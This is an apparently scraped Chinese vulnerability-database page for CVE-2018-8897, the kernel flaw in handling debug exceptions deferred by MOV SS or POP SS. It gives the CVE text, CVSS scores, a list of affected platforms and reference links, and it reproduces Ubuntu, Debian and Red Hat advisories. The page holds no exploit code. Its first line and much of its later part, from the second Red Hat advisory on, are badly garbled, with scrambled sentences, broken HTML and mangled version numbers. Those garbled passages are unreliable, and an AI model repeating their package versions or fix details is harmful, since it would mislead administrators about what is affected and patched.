(PacketStormID:F147550) 49 <1 versiolities have beennux kernel that may prob.04 LTS | 4. .0 ,6.04 LTS | 4.4.0 n orD6.04 LTS
CVE-2018-8897
CVSS7.2
发布时间 :2018-05-08 14:29:00
修订时间 :2018-06-20 10:00:14
NMPS    

[原文]A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A; section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL < 3, the debug exception is delivered after the transfer to CPL < 3 is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs.


[CNNVD]CNNVD数据暂缺。


[机译]译文暂缺.

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-264 [权限、特权与访问控制]

- CPE (受影响的平台与产品)

cpe:/a:citrix:xenserver:6.0.2Citrix XenServer 6.0.2
cpe:/a:citrix:xenserver:6.2.0
cpe:/a:citrix:xenserver:6.5
cpe:/a:citrix:xenserver:7.0
cpe:/a:citrix:xenserver:7.1
cpe:/a:citrix:xenserver:7.2
cpe:/a:citrix:xenserver:7.3
cpe:/a:citrix:xenserver:7.4
cpe:/a:synology:skynas:-
cpe:/o:apple:mac_os_x:-
cpe:/o:apple:mac_os_x:10.0Apple Mac OS X 10.0
cpe:/o:apple:mac_os_x:10.0.0Apple Mac OS X 10.0.0
cpe:/o:apple:mac_os_x:10.0.1Apple Mac OS X 10.0.1
cpe:/o:apple:mac_os_x:10.0.2Apple Mac OS X 10.0.2
cpe:/o:apple:mac_os_x:10.0.3Apple Mac OS X 10.0.3
cpe:/o:apple:mac_os_x:10.0.4Apple Mac OS X 10.0.4
cpe:/o:apple:mac_os_x:10.1Apple Mac OS X 10.1
cpe:/o:apple:mac_os_x:10.1.0Apple Mac OS X 10.1.0
cpe:/o:apple:mac_os_x:10.1.1Apple Mac OS X 10.1.1
cpe:/o:apple:mac_os_x:10.1.2Apple Mac OS X 10.1.2
cpe:/o:apple:mac_os_x:10.1.3Apple Mac OS X 10.1.3
cpe:/o:apple:mac_os_x:10.1.4Apple Mac OS X 10.1.4
cpe:/o:apple:mac_os_x:10.1.5Apple Mac OS X 10.1.5
cpe:/o:apple:mac_os_x:10.2Apple Mac OS X 10.2
cpe:/o:apple:mac_os_x:10.2.0Apple Mac OS X 10.2.0
cpe:/o:apple:mac_os_x:10.2.1Apple Mac OS X 10.2.1
cpe:/o:apple:mac_os_x:10.2.2Apple Mac OS X 10.2.2
cpe:/o:apple:mac_os_x:10.2.3Apple Mac OS X 10.2.3
cpe:/o:apple:mac_os_x:10.2.4Apple Mac OS X 10.2.4
cpe:/o:apple:mac_os_x:10.2.5Apple Mac OS X 10.2.5
cpe:/o:apple:mac_os_x:10.2.6Apple Mac OS X 10.2.6
cpe:/o:apple:mac_os_x:10.2.7Apple Mac OS X 10.2.7
cpe:/o:apple:mac_os_x:10.2.8Apple Mac OS X 10.2.8
cpe:/o:apple:mac_os_x:10.3Apple Mac OS X 10.3
cpe:/o:apple:mac_os_x:10.3.0Apple Mac OS X 10.3.0
cpe:/o:apple:mac_os_x:10.3.1Apple Mac OS X 10.3.1
cpe:/o:apple:mac_os_x:10.3.2Apple Mac OS X 10.3.2
cpe:/o:apple:mac_os_x:10.3.3Apple Mac OS X 10.3.3
cpe:/o:apple:mac_os_x:10.3.4Apple Mac OS X 10.3.4
cpe:/o:apple:mac_os_x:10.3.5Apple Mac OS X 10.3.5
cpe:/o:apple:mac_os_x:10.3.6Apple Mac OS X 10.3.6
cpe:/o:apple:mac_os_x:10.3.7Apple Mac OS X 10.3.7
cpe:/o:apple:mac_os_x:10.3.8Apple Mac OS X 10.3.8
cpe:/o:apple:mac_os_x:10.3.9Apple Mac OS X 10.3.9
cpe:/o:apple:mac_os_x:10.4Apple Mac OS X 10.4
cpe:/o:apple:mac_os_x:10.4.0Apple Mac OS X 10.4.0
cpe:/o:apple:mac_os_x:10.4.1Apple Mac OS X 10.4.1
cpe:/o:apple:mac_os_x:10.4.2Apple Mac OS X 10.4.2
cpe:/o:apple:mac_os_x:10.4.3Apple Mac OS X 10.4.3
cpe:/o:apple:mac_os_x:10.4.4Apple Mac OS X 10.4.4
cpe:/o:apple:mac_os_x:10.4.5Apple Mac OS X 10.4.5
cpe:/o:apple:mac_os_x:10.4.6Apple Mac OS X 10.4.6
cpe:/o:apple:mac_os_x:10.4.7Apple Mac OS X 10.4.7
cpe:/o:apple:mac_os_x:10.4.8Apple Mac OS X 10.4.8
cpe:/o:apple:mac_os_x:10.4.9Apple Mac OS X 10.4.9
cpe:/o:apple:mac_os_x:10.4.10Apple Mac OS X 10.4.10
cpe:/o:apple:mac_os_x:10.4.11Apple Mac OS X 10.4.11
cpe:/o:apple:mac_os_x:10.5Apple Mac OS X 10.5
cpe:/o:apple:mac_os_x:10.5.0Apple Mac OS X 10.5.0
cpe:/o:apple:mac_os_x:10.5.1Apple Mac OS X 10.5.1
cpe:/o:apple:mac_os_x:10.5.2Apple Mac OS X 10.5.2
cpe:/o:apple:mac_os_x:10.5.3Apple Mac OS X 10.5.3
cpe:/o:apple:mac_os_x:10.5.4Apple Mac OS X 10.5.4
cpe:/o:apple:mac_os_x:10.5.5Apple Mac OS X 10.5.5
cpe:/o:apple:mac_os_x:10.5.6Apple Mac OS X 10.5.6
cpe:/o:apple:mac_os_x:10.5.7Apple Mac OS X 10.5.7
cpe:/o:apple:mac_os_x:10.5.8Apple Mac OS X 10.5.8
cpe:/o:apple:mac_os_x:10.6.0Apple Mac OS X 10.6.0
cpe:/o:apple:mac_os_x:10.6.1Apple Mac OS X 10.6.1
cpe:/o:apple:mac_os_x:10.6.2Apple Mac OS X 10.6.2
cpe:/o:apple:mac_os_x:10.6.3Apple Mac OS X 10.6.3
cpe:/o:apple:mac_os_x:10.6.4Apple Mac OS X 10.6.4
cpe:/o:apple:mac_os_x:10.6.5Apple Mac OS X 10.6.5
cpe:/o:apple:mac_os_x:10.6.6Apple Mac OS X 10.6.6
cpe:/o:apple:mac_os_x:10.6.7Apple Mac OS X 10.6.7
cpe:/o:apple:mac_os_x:10.6.8Apple Mac OS X 10.6.8
cpe:/o:apple:mac_os_x:10.7.0Apple Mac OS X 10.7.0
cpe:/o:apple:mac_os_x:10.7.1Apple Mac OS X 10.7.1
cpe:/o:apple:mac_os_x:10.7.2Apple Mac OS X 10.7.2
cpe:/o:apple:mac_os_x:10.7.3Apple Mac OS X 10.7.3
cpe:/o:apple:mac_os_x:10.7.4Apple Mac OS X 10.7.4
cpe:/o:apple:mac_os_x:10.7.5Apple Mac OS X 10.7.5
cpe:/o:apple:mac_os_x:10.8.0
cpe:/o:apple:mac_os_x:10.8.1
cpe:/o:apple:mac_os_x:10.8.2
cpe:/o:apple:mac_os_x:10.8.3
cpe:/o:apple:mac_os_x:10.8.4
cpe:/o:apple:mac_os_x:10.8.5
cpe:/o:apple:mac_os_x:10.8.5:supplemental_update
cpe:/o:apple:mac_os_x:10.9
cpe:/o:apple:mac_os_x:10.9.1
cpe:/o:apple:mac_os_x:10.9.2
cpe:/o:apple:mac_os_x:10.9.3
cpe:/o:apple:mac_os_x:10.9.4
cpe:/o:apple:mac_os_x:10.9.5
cpe:/o:apple:mac_os_x:10.10.0
cpe:/o:apple:mac_os_x:10.10.1
cpe:/o:apple:mac_os_x:10.10.2
cpe:/o:apple:mac_os_x:10.10.3
cpe:/o:apple:mac_os_x:10.10.4
cpe:/o:apple:mac_os_x:10.10.5
cpe:/o:apple:mac_os_x:10.11.0
cpe:/o:apple:mac_os_x:10.11.1
cpe:/o:apple:mac_os_x:10.11.2
cpe:/o:apple:mac_os_x:10.11.3
cpe:/o:apple:mac_os_x:10.11.4
cpe:/o:apple:mac_os_x:10.11.5
cpe:/o:apple:mac_os_x:10.11.6
cpe:/o:apple:mac_os_x:10.12.0
cpe:/o:apple:mac_os_x:10.12.1
cpe:/o:apple:mac_os_x:10.12.2
cpe:/o:apple:mac_os_x:10.12.3
cpe:/o:apple:mac_os_x:10.12.4
cpe:/o:apple:mac_os_x:10.12.5
cpe:/o:apple:mac_os_x:10.12.6
cpe:/o:apple:mac_os_x:10.13.0
cpe:/o:canonical:ubuntu_linux:14.04::~~lts~~~
cpe:/o:canonical:ubuntu_linux:16.04::~~lts~~~
cpe:/o:canonical:ubuntu_linux:17.10
cpe:/o:debian:debian_linux:7.0
cpe:/o:debian:debian_linux:8.0
cpe:/o:debian:debian_linux:9.0
cpe:/o:redhat:enterprise_linux_server:7.0
cpe:/o:redhat:enterprise_linux_workstation:7.0
cpe:/o:redhat:enterprise_virtualization_manager:3.0Red Hat Enterprise Virtualization Manager (aka RHEV-M) 3.0
cpe:/o:synology:diskstation_manager:5.2
cpe:/o:synology:diskstation_manager:6.0
cpe:/o:synology:diskstation_manager:6.1
cpe:/o:xen:xen:-::~~~~x86~

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8897
(官方数据源) NVD

- 其它链接及资源

http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=d8ba61ba58c88d5207c1ba2f7d9a2280e7d03be9
(VENDOR_ADVISORY)  MISC  http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=d8ba61ba58c88d5207c1ba2f7d9a2280e7d03be9
http://openwall.com/lists/oss-security/2018/05/08/1
(VENDOR_ADVISORY)  MISC  http://openwall.com/lists/oss-security/2018/05/08/1
http://openwall.com/lists/oss-security/2018/05/08/4
(VENDOR_ADVISORY)  MISC  http://openwall.com/lists/oss-security/2018/05/08/4
http://www.securityfocus.com/bid/104071
(VENDOR_ADVISORY)  BID  104071
http://www.securitytracker.com/id/1040744
(VENDOR_ADVISORY)  SECTRACK  1040744
http://www.securitytracker.com/id/1040849
(VENDOR_ADVISORY)  SECTRACK  1040849
http://www.securitytracker.com/id/1040861
(VENDOR_ADVISORY)  SECTRACK  1040861
http://www.securitytracker.com/id/1040866
(VENDOR_ADVISORY)  SECTRACK  1040866
http://www.securitytracker.com/id/1040882
(VENDOR_ADVISORY)  SECTRACK  1040882
https://access.redhat.com/errata/RHSA-2018:1318
(VENDOR_ADVISORY)  REDHAT  RHSA-2018:1318
https://access.redhat.com/errata/RHSA-2018:1319
(VENDOR_ADVISORY)  REDHAT  RHSA-2018:1319
https://access.redhat.com/errata/RHSA-2018:1345
(VENDOR_ADVISORY)  REDHAT  RHSA-2018:1345
https://access.redhat.com/errata/RHSA-2018:1346
(VENDOR_ADVISORY)  REDHAT  RHSA-2018:1346
https://access.redhat.com/errata/RHSA-2018:1347
(VENDOR_ADVISORY)  REDHAT  RHSA-2018:1347
https://access.redhat.com/errata/RHSA-2018:1348
(VENDOR_ADVISORY)  REDHAT  RHSA-2018:1348
https://access.redhat.com/errata/RHSA-2018:1349
(VENDOR_ADVISORY)  REDHAT  RHSA-2018:1349
https://access.redhat.com/errata/RHSA-2018:1350
(VENDOR_ADVISORY)  REDHAT  RHSA-2018:1350
https://access.redhat.com/errata/RHSA-2018:1351
(VENDOR_ADVISORY)  REDHAT  RHSA-2018:1351
https://access.redhat.com/errata/RHSA-2018:1352
(VENDOR_ADVISORY)  REDHAT  RHSA-2018:1352
https://access.redhat.com/errata/RHSA-2018:1353
(VENDOR_ADVISORY)  REDHAT  RHSA-2018:1353
https://access.redhat.com/errata/RHSA-2018:1354
(VENDOR_ADVISORY)  REDHAT  RHSA-2018:1354
https://access.redhat.com/errata/RHSA-2018:1355
(VENDOR_ADVISORY)  REDHAT  RHSA-2018:1355
https://access.redhat.com/errata/RHSA-2018:1524
(VENDOR_ADVISORY)  REDHAT  RHSA-2018:1524
https://bugzilla.redhat.com/show_bug.cgi?id=1567074
(VENDOR_ADVISORY)  MISC  https://bugzilla.redhat.com/show_bug.cgi?id=1567074
https://github.com/can1357/CVE-2018-8897/
(VENDOR_ADVISORY)  MISC  https://github.com/can1357/CVE-2018-8897/
https://github.com/torvalds/linux/commit/d8ba61ba58c88d5207c1ba2f7d9a2280e7d03be9
(VENDOR_ADVISORY)  MISC  https://github.com/torvalds/linux/commit/d8ba61ba58c88d5207c1ba2f7d9a2280e7d03be9
https://lists.debian.org/debian-lts-announce/2018/05/msg00015.html
(VENDOR_ADVISORY)  MLIST  [debian-lts-announce] 20180525 [SECURITY] [DLA 1383-1] xen security update
https://lists.debian.org/debian-lts-announce/2018/06/msg00000.html
(VENDOR_ADVISORY)  MLIST  [debian-lts-announce] 20180601 [SECURITY] [DLA 1392-1] linux security update
https://patchwork.kernel.org/patch/10386677/
(VENDOR_ADVISORY)  MISC  https://patchwork.kernel.org/patch/10386677/
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8897
(VENDOR_ADVISORY)  CONFIRM  https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8897
https://support.apple.com/HT208742
(VENDOR_ADVISORY)  MISC  https://support.apple.com/HT208742
https://support.citrix.com/article/CTX234679
(VENDOR_ADVISORY)  CONFIRM  https://support.citrix.com/article/CTX234679
https://svnweb.freebsd.org/base?view=revision&revision=333368
(VENDOR_ADVISORY)  MISC  https://svnweb.freebsd.org/base?view=revision&revision=333368
https://usn.ubuntu.com/3641-1/
(VENDOR_ADVISORY)  UBUNTU  USN-3641-1
https://usn.ubuntu.com/3641-2/
(VENDOR_ADVISORY)  UBUNTU  USN-3641-2
https://www.debian.org/security/2018/dsa-4196
(VENDOR_ADVISORY)  DEBIAN  DSA-4196
https://www.debian.org/security/2018/dsa-4201
(VENDOR_ADVISORY)  DEBIAN  DSA-4201
https://www.exploit-db.com/exploits/44697/
(VENDOR_ADVISORY)  EXPLOIT-DB  44697
https://www.freebsd.org/security/advisories/FreeBSD-SA-18:06.debugreg.asc
(VENDOR_ADVISORY)  MISC  https://www.freebsd.org/security/advisories/FreeBSD-SA-18:06.debugreg.asc
https://www.synology.com/support/security/Synology_SA_18_21
(VENDOR_ADVISORY)  CONFIRM  https://www.synology.com/support/security/Synology_SA_18_21
https://www.triplefault.io/2018/05/spurious-db-exceptions-with-pop-ss.html
(VENDOR_ADVISORY)  MISC  https://www.triplefault.io/2018/05/spurious-db-exceptions-with-pop-ss.html
https://xenbits.xen.org/xsa/advisory-260.html
(VENDOR_ADVISORY)  MISC  https://xenbits.xen.org/xsa/advisory-260.html

- 漏洞信息 (F147552)

Kernel Live Patch Security Notice LSN-0038-1 (PacketStormID:F147552)
2018-05-09 00:00:00
Benjamin M. Romer  
advisory,kernel
linux
CVE-2018-1087,CVE-2018-8897
[点击下载]

On May 8, fixes for CVE-2018-1087 and CVE-2018-8897 were released in linux kernel version 4.4.0-124.148. These CVEs are both related to the way that the linux kernel handles certain interrupt and exception instructions. If an interrupt or exception instruction (INT3, SYSCALL, etc.) is immediately preceded by a MOV SS or POP SS instruction, the resulting interrupt will be incorrectly handled, possibly crashing the operating system. The issue can be triggered by an unprivileged user. The fix for this problem requires modification of the interrupt descriptor tables (IDT), and modification of the interrupt handlers. Livepatch is unable to safely modify these areas, so upgrading to a corrected kernel and rebooting is required to fix the problem.

==========================================================================
Kernel Live Patch Security Notice LSN-0038-1
May 8, 2018

linux vulnerability
==========================================================================

A security issue affects these releases of Ubuntu:

| Series           | Base kernel  | Arch     | flavors          |
|------------------+--------------+----------+------------------|
| Ubuntu 16.04 LTS | 4.4.0        | amd64    | generic          |
| Ubuntu 16.04 LTS | 4.4.0        | amd64    | lowlatency       |
| Ubuntu 14.04 LTS | 4.4.0        | amd64    | generic          |
| Ubuntu 14.04 LTS | 4.4.0        | amd64    | lowlatency       |

Summary:

On May 8, fixes for CVE-2018-1087 and CVE-2018-8897 were released in linux
kernel version 4.4.0-124.148. These CVEs are both related to the way that
the linux kernel handles certain interrupt and exception instructions. If
an interrupt or exception instruction (INT3, SYSCALL, etc.) is immediately
preceded by a MOV SS or POP SS instruction, the resulting interrupt will 
be incorrectly handled, possibly crashing the operating system. The issue
can be triggered by an unprivileged user.

The fix for this problem requires modification of the interrupt descriptor
tables (IDT), and modification of the interrupt handlers. Livepatch is 
unable to safely modify these areas, so upgrading to a corrected kernel
and rebooting is required to fix the problem. 

Additional information about this problem can be found here:
- https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/Pop_SS

Software Description:
- linux: Linux kernel

Update instructions:

The problem can be corrected by installing an updated kernel with these
fixes and rebooting.

References:
CVE-2018-1087, CVE-2018-8897

-- 
ubuntu-security-announce mailing list
ubuntu-security-announce@lists.ubuntu.com
Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce
    

- 漏洞信息 (F147551)

Debian Security Advisory 4196-1 (PacketStormID:F147551)
2018-05-09 00:00:00
Debian  debian.org
advisory,denial of service,kernel,vulnerability
linux,debian
CVE-2018-1087,CVE-2018-8897
[点击下载]

Debian Linux Security Advisory 4196-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation or denial of service.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4196-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
May 08, 2018                          https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : linux
CVE ID         : CVE-2018-1087 CVE-2018-8897
Debian Bug     : 897427 897599 898067 898100

Several vulnerabilities have been discovered in the Linux kernel that
may lead to a privilege escalation or denial of service.

CVE-2018-1087

    Andy Lutomirski discovered that the KVM implementation did not
    properly handle #DB exceptions while deferred by MOV SS/POP SS,
    allowing an unprivileged KVM guest user to crash the guest or
    potentially escalate their privileges.

CVE-2018-8897

    Nick Peterson of Everdox Tech LLC discovered that #DB exceptions
    that are deferred by MOV SS or POP SS are not properly handled,
    allowing an unprivileged user to crash the kernel and cause a denial
    of service.

For the oldstable distribution (jessie), these problems have been fixed
in version 3.16.56-1+deb8u1. This update includes various fixes for
regressions from 3.16.56-1 as released in DSA-4187-1 (Cf. #897427,
#898067 and #898100).

For the stable distribution (stretch), these problems have been fixed in
version 4.9.88-1+deb9u1. The fix for CVE-2018-1108 applied in DSA-4188-1
is temporarily reverted due to various regression, cf. #897599.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security
tracker page at:
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlryHFFfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND
z0SMQA/9HoJDt2OdyqqtfNUuWfP3sgGV1QVjIJnF39unKRdIaGw9m0RHQUu1G3rC
cgxcYcpQ0h10Yy5KVh4APqt55K7aVWVQT6xB0yx2VddMEwwl3rp2r/eL7EtoOkQT
zZW5JponzlEAjC9uGk7CouA7z/qFtd5awufFhAjMF5eL4ZQ6pG8wWEbae6DbU9nz
c7F+okC4hL6yPuWVEWzTRUFK1W0hs2N+VQgHV/afZaMAAooeZJDJeq1Hn/PVYvwJ
IHSOs01+kn0OUFHkVRA7kVdFAYUJlfhsDcXd9nB/lkxhc/HNI1g/dK76mRxjsiMo
pJlkPbEmZlOtmNG7vogxEp72ab24j2CITIHiID7ftZH5R/I2CSxp2dIzRVKdmP6P
tsfh/KcpUMNwwiPiGed1DMCjtsHOodBOkLtVsoHHJVMZg2xqfCrlqNRUn9o+0DcR
gO7HBsWG9K1qvSBWuRtQLT8QP00P3dSdhHmfWyfN8eJxTot+WJuMF/o+jbF6GGrZ
lPmzWqg4oL7jvQO8nlEkatjIFejEg0jmt+rCXyEbK8Uc9xjJk35GKIZne5X09BFe
36zY7HbMlPvLP/VHSb6fcPBpQo/HuG0/htAB1HpWS1fPrth1J76g2EmwFSG5Lo51
IRxTXP4UZuOL1sJHQ80220tThKs2dk1Yy77dKk8qQiQ2nC2JgNs=
=CskH
-----END PGP SIGNATURE-----
    

- 漏洞信息 (F147550)

Red Hat Security Advisory 2018-1353-01 (PacketStormID:F147550)
2018-05-08 00:00:00
Red Hat  
advisory,denial of service,kernel
linux,redhat
CVE-2018-8897
[点击下载]

Red Hat Security Advisory 2018-1353-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Moderate: kernel security update
Advisory ID:       RHSA-2018:1353-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2018:1353
Issue date:        2018-05-08
CVE Names:         CVE-2018-8897 
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 5
Extended Lifecycle Support.

Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server (v. 5 ELS) - i386, noarch, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux
operating system.

Security Fix(es):

* Kernel: error in exception handling leads to DoS (CVE-2018-8897)

For mor fr6n===ch, s390x, x86_64

3. Desl: e.coity se=ch)aC0x, O_64

3. Desl:urity Fix(esn orD6ormatio the waon about De, its securink(s) ihttpe Reian.sion 4ences section.

2. Relevanterpriswouldeiakeecurin 
    

49span id="pm_info_psF147550" classt="_">- 漏洞信息 (F147550) t="able width="90%" border="0" align="center">

Red Hat S.04 LTSNotice LSN-0038-2
2018-05-08 00:00:00
Red Hat &.04 LTShref="http://www.debiacom/filesm/mailman/l"_blank">(PacketStcom/filesm/mailman/>
advisory,denial of service,kernel,vulnerabiloealility
linux,debian
CVE-2018-1087,CVE-2000199,1087,CVE-2018-8897
========================================================================== Kernel Li.04 LTSNotice LSN-0038-2 2d -a34- | 3>2d -a34.180 ebian2d -a34- -pae |3>2d -a34.180 ebian2d -a34-highb 2d -a34.180 ebian2d -a34-omape id="3>2d -a34.180 ebian2d -a34-poasepc-smp="3>2d -a34.180 ebian2d -a34-poasepc64-smp="3>2d -a34.180 ebian2d -a34-ation_ml="3>2d -a34.180 ebian2d .a34.149 ebian2d .a34.149 ebian2d .a34.149 ebian2d .a34.149 ebian2d .a34.149 ebian2d .a34.149 Af.saty iteadardnd frequcludes de yne the p. Ref em ans/syut securmake ullrink(neat.cMay cn

48span id="pm_info_psF147550" classt8"_">- 漏洞信息 (F147550) t8table width="90%" border="0" align="center">

Red Hat Security Advisory 2018-1353-01 2 (PacketStormID:F147550) 48
2018-05-08 00:00:00
Red Hat  
advisory,denial of service,kernel
linux,redhat
CVE-2018-8897

Red Hat Security Advisory 2018-1353-01 - Th2 kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Moderate: kernel security update
Advisory ID:       RHSA-2018:1353-01
Prod2ct:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2018:1353
Issue d2te:        2018-05-08
CVE Names:         CVE-2018-8897 
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 5
Extended.9 Lori
 Supt Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server (vLorie SupS) - i.9 s 5 EL noarch, sia64 s390x, x8. Description:

The kernel packages contain the Linux kernel, the core of any Linux
operating system.

Security Fix(es):

* Kernel: error in exception handling leads to DoS (CVE-2018-8897)

For mor fr6n===ch, s390x, x86_64

3. Desl: e.coity se=ch)aC0x, O_64

3. Desl:urity Fix(esn orD6ormatio the waon about De, its securink(s) ihttpe Reian.sion 4ences section.

2. Relevanterpriswouldeiakeecurin 
    

- 漏洞信息 (F147550) t7"able width="90%" border="0" align="center"> Red Hat S.04 LTSNotice LSN-0038-2 <https://wormID:F147550) 47 2018-05-08 00:00:00 Red Hat &.04 LTShref="http://www.debiacom/filesm/mailman/l"_blank">(PacketStcom/filesm/mailman/> advisory,denial of service,kernel,vulnerabiloeal linux,debian CVE-2018-1087,CVE-2000199,1087,CVE-2018-8897 ========================================================================== Kernel Li.04 LTSNotice LSN-0038-2 <12018 ulnerab,bian< | 4>.46 ebian< -lpae |4>.46 ebian.46 ebian.44 ebian.44 ebian.44 ebian4d -a023.28 ebian4d -a057uawsuntl="4>4d -a057.66 ebian4d -a089uraspi2 4>4d -a089.97 ebian4d -a092-snapdrag SY 4>4d -a092.97 ebian4d -a24< | 4>48. These C ebian4d -a24< -lpae |4>48. These C ebian4d -a2448. These C ebian4d -a2448. These C ebian4d -a2448. These C ebian4d -a2448. These C ebian4d -a2448. These C ebian4d -9027ueu('id | 4>48. 9027.29 ebian4d .a057.59 ebian4d .ahese30 ebian.60 ebian4d .ahese30 ebian.60 ebian4d .a023.22 ebian4d .ahese30 ebian.60 ebian4d .ahese30 ebian4d .a089.89 ebian4d .a092.848,204 LTS 4 4.4.0 : ebian4d -a019.19 ebian4d -a24< | 4>48. These C~ 4 4..1 ebian4d -a24< -lpae |4>48. These C~ 4 4..1 ebian4d -a2448. These C~ 4 4..1 ebian4d -a2448. These C~ 4 4..1 ebian4d -a2448. These C~ 4 4..1 ebian4d -a2448. These C~ 4 4..1 ebian4d -a2448. These C~ 4 4..1 ebian4d .a019.19 ebian Unlcaatde ymanulate ung an upe le distradardnd causems39contain (e.g.bian<1 eb1087,CVE-2000199, 1087, CVE-2018-8897 -- ubunt : In about De8-/access.relaunchpad.netecurity/+seurceurther/4>.46 ebccess.relaunchpad.netecurity/+seurceurther-raspi2/4>48. These C ebccess.relaunchpad.netecurity/+seurceurther-aws/4>48. T057.66 ebccess.relaunchpad.netecurity/+seurceurther-azues/4>48. 9027.29 ebccess.relaunchpad.netecurity/+seurceurther- cp/4>.46~ | 4..1 ebccess.relaunchpad.netecurity/+seurceurther-kvm/4>48. T023.28 ebccess.relaunchpad.netecurity/+seurceurther-oem/4>4d -a089.97 ebccess.relaunchpad.netecurity/+seurceurther-snapdrag S/4>4d -a092.97 ebccess.relaunchpad.netecurity/+seurceurther/3>48. T019.19 ebccess.relaunchpad.netecurity/+seurceurther-lce]x of s/4>48. These C~ 4 4..1 ble>

- 漏洞信息 (F147550) t6table width="90%" border="0" align="center"> Red Hat Security Advisory 2018-1353-01 4 https://wormID:F147550) 46 2018-05-08 00:00:00 Red Hat   advisory,denial of service,kernel linux,redhat CVE-2018-1087,CVE-2000199,1087,CVE-

Red Hat Security Advisory 2018-1353-01 - Th4 kernel packages-rt contain tproviusrences vicTimlenel thKe core es a esafels vene-tung gsprobc freqs3%"t extreme #DBighf s3erminism modific didsaddressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================

A securi                   ecurity Advisory

Synopsis:          Moderate:I revteat:ackages-rt update
Advisory ID:       RHSA-2018:1353-01
Prod4ct:           Red Hat Enterprise Linux
AdvMRG probRHEL-6 URL:      https://access.redhat.com/errata/RHSA-2018:1353
Issue d4te:        2018-05-08
CVE Names:         CVE-2018-8897 
========1087,CVE-2000199==============================================================

1. Summary:

An update for kernel is now a-rt ailable for Red Hat Enterprise Linux 5
EMRG 2t Product Security has rated this update as having a security impact
of Moderate.I revteatn Vulnerability Scoring System (CVSS) base score, which
gi
es a  etailed severity rating, is available for each vulnerability from
the
p56-1ink(s) in the References section.

2. Relevant releases/architectures:

Red Hat EnterprisMRG s vitimleprobRHEL 6v. 5 ELSv./a--390x, x8. Description:

The kernel packages-rt contain tproviusrences vicTimlenel thKe core es a  esafels
vene-tung gsprobc freqs3%"t  extreme #DBighf s3erminism modific didsay Fix(es):

* Kernel: error in exception handling leads to DoS (CVE-2018-8897)

For mor f*ackagesoolinuxe(Refe by ins exceptleads to DoS (CVE- by udling orD6201
-8897)

Fo2000199)inr6n===ch, s390x, x86_64

3. Desl: e.coity se=ch)aC0x, O_64

3. Desl:urity Fix(esn orD6ormatio the waon about De, its securink(s) ihttpe Reian.sion 4ences section.

